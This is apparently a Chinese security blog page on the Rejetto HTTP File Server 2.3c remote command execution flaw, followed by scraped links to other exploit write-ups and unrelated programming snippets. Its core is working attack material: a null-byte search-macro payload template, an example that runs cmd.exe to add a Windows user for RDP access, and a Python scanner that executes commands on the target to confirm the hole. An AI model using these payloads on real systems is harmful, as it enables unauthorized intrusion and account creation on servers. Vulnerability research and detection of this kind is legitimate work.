一、HFS漏洞

1、影响版本 : 2.3c以前的2.3x版本

2、HFS:

HFS是HTTP File Server,国外的一款HTTP 文件服务器软件,简单易上手。

3、漏洞描述:

HTTP File Server是一款专为个人用户所设计的HTTP文件服务器,它提供虚拟档案系统,支持新增、移除虚拟档案资料夹等。

Rejetto HTTP File Server 2.3c及之前版本中的parserLib.pas文件中的‘findMacroMarker’函数中存在安全漏洞,该漏洞源于parserLib.pas文件没有正确处理空字节。远程攻击者可借助搜索操作中的‘%00’序列利用该漏洞执行任意程序。

4、攻击payload及过程:

4.1 Payload:http://127.0.0.1:8080/?search==%00{.exec|cmd.exe /c [Command-String].}

4.2攻击过程实例:

http://127.0.0.1:8080/?search==%00{.exec|cmd.exe /c net user test1234 1234 /add.}

说明这个OK的前提是HFS以管理员权限运行: 

5、payload:

 #-*- coding:utf-8 -*-

 """

 这个脚本是检测是否有HFS漏洞的

 当HFS版本处于2.3c机器之前的HFS2.3x版本均可以

 当HFS以管理员身份运行时候可以get-shell

 原理是创建一个新用户,设置密码和权限,然后你就可以RDP了

 """

 #引入依赖的包、库文件

 import time

 import uuid

 import requests

 from optparse import OptionParser

 #定义扫描类

 class HFSScanner:

     """

         HFS扫描类,原理是:

             (1)生成随机字符串,利用命令执行写入远端服务器的HFS.exe目录下的一个文件。

             (2)然后再次利用这里漏洞将文件内容读取出来放在响应报文的头部字段set-cookie中。

             (3)通过判断响应报文该字段是否包含随机字符串来确定是否存在漏洞

     """

     def __init__(self,target,port):

         """创建扫描类实例对象"""

         self.__randomflag = uuid.uuid1() #攻击验证随机标志字符串

         self.__attack_url = r"http://%s:%s/"%(str(target),str(port))+"?search==%00"+r"{.exec|cmd.exe /c del result}"+r"{"+".exec|cmd.exe /c echo>result "+str(self.__randomflag)+"."+"}"

         self.__verify_url = r"http://%s:%s/"%(str(target),str(port))+"?search==%00"+"{.cookie|out|value={.load|result.}.}"

     def __attack(self):

         """发送攻击报文,响应200后反回True"""

         try:

             response = requests.get(self.__attack_url,timeout=120)

         except Exception,reason:

             return False

         if response.status_code != 200:

             return False

         return True

     def __verify(self):

         """发送验证报文,判断set-cookie字段是否为随机标志字符串"""

         try:

             response = requests.get(self.__verify_url,timeout=120)

         except Exception,reason:

             return False

         if response.headers.get("set-cookie").find(str(self.__randomflag)) >= 0:

             return True

         else:

             return False

     def scan(self):

         """扫描函数"""

         print "[+] 开始测试..."

         if self.__attack():

             time.sleep(5)

             if self.__verify():

                 return True

         return False

 if __name__ == "__main__":

     parser = OptionParser("")

     parser.add_option("-t", dest="target",help="target to scan")

     parser.add_option("-p", dest="port",help="port to scan")

     (options, args) = parser.parse_args()

     if options.target in ["",None]:

         print "[-] 请输入正确的参数!"

         print """

             正确的使用方法:

             #python hfs_vuln_scan.py -t 127.0.0.1 [-p 8080]

         """

         exit(0)

     if options.port in ["",None] or int(options.port) <= 0 and int(options.port) > 65535:

         options.port = ""

     scanner = HFSScanner(options.target,options.port)

     if scanner.scan():

         print "[*] 目标主机存在漏洞"

     else:

         print "[+] 目标主机不存在漏洞"

HFS的远程命令执行漏洞(RCE)的更多相关文章

  1. HFS远程命令执行漏洞入侵抓鸡黑阔服务器

    先来科普一下: HFS是什么? hfs网络文件服务器 2.3是专为个人用户所设计的HTTP档案系统,如果您觉得架设FTP Server太麻烦,那么这个软件可以提供您更方便的网络文件传输系统,下载后无须 ...

  2. FlexPaper 2.3.6 远程命令执行漏洞 附Exp

    影响版本:小于FlexPaper 2.3.6的所有版本 FlexPaper (https://www.flowpaper.com) 是一个开源项目,遵循GPL协议,在互联网上非常流行.它为web客户端 ...

  3. struts2远程命令执行漏洞S2-045

    Apache Struts2最新漏洞(CVE-2017-5638,S02-45) struts2远程命令执行漏洞S2-045 Apache Struts 2被曝存在远程命令执行漏洞,漏洞编号S2-04 ...

  4. 【漏洞公告】高危:Windows系统 SMB/RDP远程命令执行漏洞

    2017年4月14日,国外黑客组织Shadow Brokers发出了NSA方程式组织的机密文档,包含了多个Windows 远程漏洞利用工具,该工具包可以可以覆盖全球70%的Windows服务器,为了确 ...

  5. Apache Tomcat远程命令执行漏洞(CVE-2017-12615) 漏洞利用到入侵检测

    本文作者:i春秋作家——Anythin9 1.漏洞简介 当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 fals ...

  6. Drupal 远程命令执行漏洞(CVE-2018-7600)

    名称: Drupal 远程命令执行漏洞 CVE-ID: CVE-2018-7600 Poc: https://paper.seebug.org/578/ EXPLOIT-DB: https://www ...

  7. D-Link service.cgi远程命令执行漏洞复现

    1.1 概述 友讯集团(D-Link),成立于1986年,1994年10月于台湾证券交易所挂牌上市,为台湾第一家上市的网络公司,以自创D-Link品牌行销全球,产品遍及100多个国家. 1月17日,C ...

  8. Apache SSI 远程命令执行漏洞复现

    Apache SSI 远程命令执行漏洞复现 一.漏洞描述 当目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用<!--#exec cmd=”id” -->语法执行命令. 使 ...

  9. ThinkPHP 5.x远程命令执行漏洞复现

    ThinkPHP 5.x远程命令执行漏洞复现 一.漏洞描述 2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞: https://blog.th ...

随机推荐

  1. Hibernate- 开发环境准备

    数据库:两张表,两者通过publisher_id构成关联关系. Book(图书表) CREATE TABLE `t_book` ( `id` int(11) NOT NULL AUTO_INCREME ...

  2. MongoDB Shell 了解使用

    配置环境变量 WIN10系统:右键单击"此电脑"--属性--高级系统设置--高级--环境变量,添加C:\Program Files\MongoDB\Server\3.0\bin 如 ...

  3. etl获取转换文件名

  4. mysql 修改用户权限,允许远程连接数据库

    GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'admin123' WITH GRANT OPTION; flush privileg ...

  5. 关于SQL语句的一些注意事项

    1.Into 表后要编辑-IntelliSense-刷新本地缓存 才能访问新表 2.Is null不是=null

  6. snmp trap编写

    1.MIB库查看net-snmp的安装目录./usr/share/snmp/mibs目录下: NET-SNMP-EXAMPLES-MIB.mib本件部分内容如下: netSnmpExampleHear ...

  7. WinInet 小例子

    #include <windows.h> #include <wininet.h> #include <string> #include <iostream& ...

  8. CentOS查看何人何时登陆用户

    使用linux 的last命令: last命令列出的是/var/log 目录下的wtmp文件内容,这个文件存的是二进制内容,不可以直接用vi等文本边界软件打开.这样即使是root用户也不可能随随便便的 ...

  9. ThinkPHP之文件上传

    在项目其中.我们有的时候需要上传图片的功能.简单的从面相过程的方法是相对较为复杂的,要一步一步的来.假设用框架的话,相对就简单了很多,主要就是方法以及每个变量所代表的意义,然后就是一些注意的地方了. ...

  10. 阿里巴巴CI/CD之分层自动化

    一佛是阿里巴巴B2B事业群高级产品经理.从事多年互联网系统的研发和测试工作,目前主要负责云效分层自动化测试的产品设计.因为自动化测试在实践过程中,总是碰到各种各样的问题,导致进入自动化测试盲区.所以, ...